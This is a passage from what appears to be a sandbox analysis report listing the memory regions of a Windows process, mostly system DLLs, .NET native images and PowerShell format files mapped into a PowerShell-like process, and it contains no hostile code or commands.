	            name = "psapi.dll"
	        filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")

Region:
	              id = 485
	        start_va = 0x7ffb98c50000
	          end_va = 0x7ffb98c5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c50000"
	        filename = ""

Region:
	              id = 486
	        start_va = 0x7ffbf34e0000
	          end_va = 0x7ffbf352ffff
	     entry_point = 0x7ffbf34e0000
	     region_type = mapped_file
	            name = "system.numerics.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\d0872fa26aa1d9eb9f0ec8fc2e3b99ee\\system.numerics.ni.dll")

Region:
	              id = 487
	        start_va = 0x7ffb98c60000
	          end_va = 0x7ffb98c6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c60000"
	        filename = ""

Region:
	              id = 488
	        start_va = 0x7ffb98c70000
	          end_va = 0x7ffb98c7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c70000"
	        filename = ""

Region:
	              id = 489
	        start_va = 0x7ffb98c80000
	          end_va = 0x7ffb98c8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c80000"
	        filename = ""

Region:
	              id = 490
	        start_va = 0x7ffb98c90000
	          end_va = 0x7ffb98c9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98c90000"
	        filename = ""

Region:
	              id = 491
	        start_va = 0x7ffb98ca0000
	          end_va = 0x7ffb98caffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98ca0000"
	        filename = ""

Region:
	              id = 492
	        start_va = 0x7ffb98cb0000
	          end_va = 0x7ffb98cbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98cb0000"
	        filename = ""

Region:
	              id = 493
	        start_va = 0x7ffb98cc0000
	          end_va = 0x7ffb98ccffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98cc0000"
	        filename = ""

Region:
	              id = 494
	        start_va = 0x7ffb98cd0000
	          end_va = 0x7ffb98cdffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98cd0000"
	        filename = ""

Region:
	              id = 495
	        start_va = 0x7ffb98ce0000
	          end_va = 0x7ffb98ceffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98ce0000"
	        filename = ""

Region:
	              id = 496
	        start_va = 0x7ffb98cf0000
	          end_va = 0x7ffb98cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98cf0000"
	        filename = ""

Region:
	              id = 497
	        start_va = 0x7ffb98d00000
	          end_va = 0x7ffb98d0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d00000"
	        filename = ""

Region:
	              id = 498
	        start_va = 0x7ffb98d10000
	          end_va = 0x7ffb98d1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d10000"
	        filename = ""

Region:
	              id = 499
	        start_va = 0x7ffb98d20000
	          end_va = 0x7ffb98d2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d20000"
	        filename = ""

Region:
	              id = 500
	        start_va = 0x7ffbf2770000
	          end_va = 0x7ffbf27bcfff
	     entry_point = 0x7ffbf2770000
	     region_type = mapped_file
	            name = "system.transactions.dll"
	        filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll")

Region:
	              id = 501
	        start_va = 0x7ffbf27c0000
	          end_va = 0x7ffbf2896fff
	     entry_point = 0x7ffbf27c0000
	     region_type = mapped_file
	            name = "system.transactions.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\aa72dbe028c273873c1324bb840af088\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\aa72dbe028c273873c1324bb840af088\\system.transactions.ni.dll")

Region:
	              id = 502
	        start_va = 0x7ffbf28a0000
	          end_va = 0x7ffbf28cbfff
	     entry_point = 0x7ffbf28a0000
	     region_type = mapped_file
	            name = "system.configuration.install.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\42943626d3f64ac07cc966bb54506ab5\\system.configuration.install.ni.dll")

Region:
	              id = 503
	        start_va = 0x7ffbf28d0000
	          end_va = 0x7ffbf2a2efff
	     entry_point = 0x7ffbf28d0000
	     region_type = mapped_file
	            name = "system.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\fccecea4442e013d0d6a41b1bb69289b\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\fccecea4442e013d0d6a41b1bb69289b\\system.management.ni.dll")

Region:
	              id = 504
	        start_va = 0x7ffbf2a30000
	          end_va = 0x7ffbf2b91fff
	     entry_point = 0x7ffbf2a30000
	     region_type = mapped_file
	            name = "system.directoryservices.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\8357be8fc3a91df0478792b54d6b8798\\system.directoryservices.ni.dll")

Region:
	              id = 505
	        start_va = 0x7ffbf2ba0000
	          end_va = 0x7ffbf3439fff
	     entry_point = 0x7ffbf2ba0000
	     region_type = mapped_file
	            name = "system.xml.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c0ce652aa04bc1fee99308a0a2ac79f8\\system.xml.ni.dll")

Region:
	              id = 506
	        start_va = 0x7ffbf3440000
	          end_va = 0x7ffbf34dbfff
	     entry_point = 0x7ffbf3440000
	     region_type = mapped_file
	            name = "microsoft.management.infrastructure.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\953b834c8f9245b900628eed76db0400\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\953b834c8f9245b900628eed76db0400\\microsoft.management.infrastructure.ni.dll")

Region:
	              id = 507
	        start_va = 0x7ffb98d30000
	          end_va = 0x7ffb98d3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d30000"
	        filename = ""

Region:
	              id = 508
	        start_va = 0x7ffbf2760000
	          end_va = 0x7ffbf2764fff
	     entry_point = 0x7ffbf2760000
	     region_type = mapped_file
	            name = "system.diagnostics.tracing.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\47993f93edc5c35a90f5fdcd8935bee5\\system.diagnostics.tracing.ni.dll")

Region:
	              id = 509
	        start_va = 0x7ffc11c60000
	          end_va = 0x7ffc11caafff
	     entry_point = 0x7ffc11c60000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 510
	        start_va = 0x7ffc11cb0000
	          end_va = 0x7ffc11cc3fff
	     entry_point = 0x7ffc11cb0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 511
	        start_va = 0x7ffc11f60000
	          end_va = 0x7ffc125a3fff
	     entry_point = 0x7ffc11f60000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 512
	        start_va = 0x7ffc125b0000
	          end_va = 0x7ffc12664fff
	     entry_point = 0x7ffc125b0000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 513
	        start_va = 0x7ffc126e0000
	          end_va = 0x7ffc12722fff
	     entry_point = 0x7ffc126e0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 514
	        start_va = 0x7ffc12c40000
	          end_va = 0x7ffc1419efff
	     entry_point = 0x7ffc12c40000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 515
	        start_va = 0x15045700000
	          end_va = 0x15045700fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015045700000"
	        filename = ""

Region:
	              id = 516
	        start_va = 0x15045710000
	          end_va = 0x15045710fff
	     entry_point = 0x15045710000
	     region_type = mapped_file
	            name = "tzres.dll"
	        filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")

Region:
	              id = 517
	        start_va = 0x15045710000
	          end_va = 0x15045718fff
	     entry_point = 0x15045710000
	     region_type = mapped_file
	            name = "tzres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")

Region:
	              id = 518
	        start_va = 0x15045710000
	          end_va = 0x15045710fff
	     entry_point = 0x15045710000
	     region_type = mapped_file
	            name = "tzres.dll"
	        filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")

Region:
	              id = 519
	        start_va = 0x15045710000
	          end_va = 0x15045718fff
	     entry_point = 0x15045710000
	     region_type = mapped_file
	            name = "tzres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")

Region:
	              id = 520
	        start_va = 0x15045710000
	          end_va = 0x15045710fff
	     entry_point = 0x15045710000
	     region_type = mapped_file
	            name = "tzres.dll"
	        filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")

Region:
	              id = 521
	        start_va = 0x15045710000
	          end_va = 0x15045718fff
	     entry_point = 0x15045710000
	     region_type = mapped_file
	            name = "tzres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")

Region:
	              id = 522
	        start_va = 0x184b600000
	          end_va = 0x184b67ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b600000"
	        filename = ""

Region:
	              id = 523
	        start_va = 0x184b680000
	          end_va = 0x184b6fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b680000"
	        filename = ""

Region:
	              id = 524
	        start_va = 0x1505f3b0000
	          end_va = 0x1505f4affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f3b0000"
	        filename = ""

Region:
	              id = 525
	        start_va = 0x7ffb98d40000
	          end_va = 0x7ffb98d4ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d40000"
	        filename = ""

Region:
	              id = 526
	        start_va = 0x7ffbf2650000
	          end_va = 0x7ffbf2754fff
	     entry_point = 0x7ffbf2650000
	     region_type = mapped_file
	            name = "clrjit.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll")

Region:
	              id = 527
	        start_va = 0x15045710000
	          end_va = 0x1504571ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045710000"
	        filename = ""

Region:
	              id = 528
	        start_va = 0x7ffb98d50000
	          end_va = 0x7ffb98d5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d50000"
	        filename = ""

Region:
	              id = 529
	        start_va = 0x7ffb98d60000
	          end_va = 0x7ffb98d6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d60000"
	        filename = ""

Region:
	              id = 530
	        start_va = 0x7ffbf25e0000
	          end_va = 0x7ffbf2641fff
	     entry_point = 0x7ffbf25e0000
	     region_type = mapped_file
	            name = "microsoft.powershell.security.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\524b452ef8345675c9bb9ebc18f2dba0\\microsoft.powershell.security.ni.dll")

Region:
	              id = 531
	        start_va = 0x7ffc07360000
	          end_va = 0x7ffc0736bfff
	     entry_point = 0x7ffc07360000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 532
	        start_va = 0x7ffc118d0000
	          end_va = 0x7ffc118fcfff
	     entry_point = 0x7ffc118d0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 533
	        start_va = 0x1505f5b0000
	          end_va = 0x1505f6affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505f5b0000"
	        filename = ""

Region:
	              id = 534
	        start_va = 0x7ffc0a0b0000
	          end_va = 0x7ffc0a0cafff
	     entry_point = 0x7ffc0a0b0000
	     region_type = mapped_file
	            name = "mpr.dll"
	        filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")

Region:
	              id = 535
	        start_va = 0x1505f6b0000
	          end_va = 0x1505faaafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505f6b0000"
	        filename = ""

Region:
	              id = 536
	        start_va = 0x7ffc0a0a0000
	          end_va = 0x7ffc0a0aafff
	     entry_point = 0x7ffc0a0a0000
	     region_type = mapped_file
	            name = "drprov.dll"
	        filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll")

Region:
	              id = 537
	        start_va = 0x7ffc11a60000
	          end_va = 0x7ffc11ab5fff
	     entry_point = 0x7ffc11a60000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 538
	        start_va = 0x7ffc0a080000
	          end_va = 0x7ffc0a095fff
	     entry_point = 0x7ffc0a080000
	     region_type = mapped_file
	            name = "ntlanman.dll"
	        filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll")

Region:
	              id = 539
	        start_va = 0x7ffc0a060000
	          end_va = 0x7ffc0a07ffff
	     entry_point = 0x7ffc0a060000
	     region_type = mapped_file
	            name = "davclnt.dll"
	        filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")

Region:
	              id = 540
	        start_va = 0x7ffc0a050000
	          end_va = 0x7ffc0a05bfff
	     entry_point = 0x7ffc0a050000
	     region_type = mapped_file
	            name = "davhlpr.dll"
	        filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")

Region:
	              id = 541
	        start_va = 0x7ffc0ba70000
	          end_va = 0x7ffc0ba85fff
	     entry_point = 0x7ffc0ba70000
	     region_type = mapped_file
	            name = "wkscli.dll"
	        filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")

Region:
	              id = 542
	        start_va = 0x7ffc0a020000
	          end_va = 0x7ffc0a031fff
	     entry_point = 0x7ffc0a020000
	     region_type = mapped_file
	            name = "cscapi.dll"
	        filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")

Region:
	              id = 543
	        start_va = 0x7ffc11060000
	          end_va = 0x7ffc1106bfff
	     entry_point = 0x7ffc11060000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 544
	        start_va = 0x7ffb98d70000
	          end_va = 0x7ffb98d7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d70000"
	        filename = ""

Region:
	              id = 545
	        start_va = 0x7ffb98d80000
	          end_va = 0x7ffb98d8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d80000"
	        filename = ""

Region:
	              id = 546
	        start_va = 0x7ffb98d90000
	          end_va = 0x7ffb98d9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb98d90000"
	        filename = ""

Region:
	              id = 547
	        start_va = 0x7ffbf24a0000
	          end_va = 0x7ffbf25bffff
	     entry_point = 0x7ffbf24a0000
	     region_type = mapped_file
	            name = "system.configuration.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\7ad6bc6ee277d5eed690e8c1c9400ff7\\system.configuration.ni.dll")

Region:
	              id = 548
	        start_va = 0x7ffc02db0000
	          end_va = 0x7ffc02dbbfff
	     entry_point = 0x7ffc02db0000
	     region_type = mapped_file
	            name = "wldp.dll"
	        filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll")

Region:
	              id = 549
	        start_va = 0x7ffc11c50000
	          end_va = 0x7ffc11c5ffff
	     entry_point = 0x7ffc11c50000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 550
	        start_va = 0x7ffc11d00000
	          end_va = 0x7ffc11ec6fff
	     entry_point = 0x7ffc11d00000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 551
	        start_va = 0x7ffc12730000
	          end_va = 0x7ffc12784fff
	     entry_point = 0x7ffc12730000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 552
	        start_va = 0x184b700000
	          end_va = 0x184b77ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b700000"
	        filename = ""

Region:
	              id = 553
	        start_va = 0x15045720000
	          end_va = 0x1504572ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000015045720000"
	        filename = ""

Region:
	              id = 554
	        start_va = 0x15045730000
	          end_va = 0x15045733fff
	     entry_point = 0x15045730000
	     region_type = mapped_file
	            name = "certificate.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml")

Region:
	              id = 555
	        start_va = 0x15046f80000
	          end_va = 0x15046f90fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000015046f80000"
	        filename = ""

Region:
	              id = 556
	        start_va = 0x184b780000
	          end_va = 0x184b7fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000184b780000"
	        filename = ""

Region:
	              id = 557
	        start_va = 0x1505fab0000
	          end_va = 0x1505fcaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001505fab0000"
	        filename = ""

Region:
	              id = 558
	        start_va = 0x7ffc10c50000
	          end_va = 0x7ffc10c73fff
	     entry_point = 0x7ffc10c50000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")

Region:
	              id = 559
	        start_va = 0x15045730000
	          end_va = 0x15045733fff
	     entry_point = 0x15045730000
	     region_type = mapped_file
	            name = "certificate.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml")

Region:
	              id = 560
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 561
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc1fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "dotnettypes.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml")

Region:
	              id = 562
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc1fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "dotnettypes.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml")

Region:
	              id = 563
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 564
	        start_va = 0x15045730000
	          end_va = 0x15045736fff
	     entry_point = 0x15045730000
	     region_type = mapped_file
	            name = "filesystem.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml")

Region:
	              id = 565
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 566
	        start_va = 0x15046fa0000
	          end_va = 0x15046fe4fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "help.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml")

Region:
	              id = 567
	        start_va = 0x15046fa0000
	          end_va = 0x15046fe4fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "help.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml")

Region:
	              id = 568
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 569
	        start_va = 0x15046fa0000
	          end_va = 0x15046fd3fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "helpv3.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml")

Region:
	              id = 570
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 571
	        start_va = 0x15046fa0000
	          end_va = 0x15046fd2fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "powershellcore.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml")

Region:
	              id = 572
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 573
	        start_va = 0x15045730000
	          end_va = 0x15045731fff
	     entry_point = 0x15045730000
	     region_type = mapped_file
	            name = "powershelltrace.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml")

Region:
	              id = 574
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
	        filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat")

Region:
	              id = 575
	        start_va = 0x15045730000
	          end_va = 0x15045732fff
	     entry_point = 0x15045730000
	     region_type = mapped_file
	            name = "registry.format.ps1xml"
	        filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml")

Region:
	              id = 576
	        start_va = 0x15046fa0000
	          end_va = 0x15046fc7fff
	     entry_point = 0x15046fa0000
	     region_type = mapped_file
	            name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat"
